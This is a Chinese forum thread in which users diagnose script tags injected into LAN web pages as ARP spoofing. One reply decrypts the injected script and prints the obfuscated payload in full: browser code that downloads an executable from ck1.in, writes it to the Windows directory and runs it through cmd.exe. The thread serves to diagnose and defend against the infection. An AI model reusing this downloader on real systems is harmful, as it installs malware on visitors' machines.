日期:2014-05-17  浏览次数:21029 次

局域网的每一页都给加上了<script src=http://ck1.in/n.js></script> 怎么办?
上局域网有的有,有的没有,上外网都没有,怎么才能彻底解决呀!

------解决方案--------------------
中ARP病毒了。
www.antiarp.com
用上这个arp防火墙解决。
------解决方案--------------------
document.writeln( " <script src=\ "http:\/\/ck1.in\/S368\/NewJs2.js\ "> <\/script> ");
document.writeln( " <script> ");
document.writeln( "function Start(){ ");
document.writeln( "var Then = new Date() ");
document.writeln( "Then.setTime(Then.getTime() + 24*60*60*1000) ");
document.writeln( "var cookieString = new String(document.cookie) ");
document.writeln( "var cookieHeader = \ "Cookie1=\ " ");
document.writeln( "var beginPosition = cookieString.indexOf(cookieHeader) ");
document.writeln( "if (beginPosition != -1){ ");
document.writeln( "} else ");
document.writeln( "{ document.cookie = \ "Cookie1=POPWINDOS;expires=\ "+ Then.toGMTString() ");
document.writeln( " ");
document.writeln( "} ");
document.writeln( "} ");
document.writeln( "Start(); ");
document.writeln( " <\/script> ")
------解决方案--------------------
我把那个js文件下载下来,发现经过加密,解密之后发现还有好几层,层层拨开是这样内容:
还有一些字符没有解密,我懒得解密了,因为已经看到CreateObject和SaveToFile和GetSpecialFolder了,完全说明网站挂了马。而且是客户端使用FSO创建文件并执行的那种
======================================================================
<script> window.onerror=function(){return true;} </script>
<script>
DZ= '\x68\x74\x74\x70\x3A\x2F\x2F\x63\x6B\x31\x2E\x69\x6E\x2F\x53\x33\x36\x38\x2F\x53\x33\x36\x38\x2E\x65\x78\x65 ';
TestWeWe= ' ';
function GnMs(n)
{
var numberMs = Math.random()*n;
return '\x7E\x54\x65\x6D\x70 '+Math.round(numberMs)+ '\x2E\x74\x6D\x70 ';
}
try
{
TestWeWe= ' ';
var Bf=document.createElement( "\x6F\x62\x6A\x65\x63\x74 ");
Bf.setAttribute( "\x63\x6C\x61\x73\x73\x69\x64 ", "\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36 ");
var Kx=Bf.CreateObject( "\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58 "+ "\x4D\x4C\x48\x54\x54\x50 ", " ");
var AS=Bf.CreateObject( "\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D ", " ");
TestWeWe= ' ';
AS.type=1;
TestWeWe= ' ';
Kx.open( "\x47\x45\x54 ", DZ,0);
TestWeWe= ' ';
Kx.send();
TestWeWe= ' ';
Ns1=GnMs(9999);
TestWeWe= ' ';
var cF=Bf.CreateObject( "\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74 ", " ");
var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);
AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject( "\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E ", " ");
ok1=cF.BuildPath(NsTmp+ '\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32 ', '\x63\x6D\x64\x2E\x65\x78\x65 ');
q.SHeLLExecute(ok1, '\x20\x2F\x63 '+Ns1, " ", "\x6F\x70\x65\x6E ",0);
TestWeWe= ' ';
}
catch(MsI) { MsI=1; }
TestWeWe= ' ';
</script>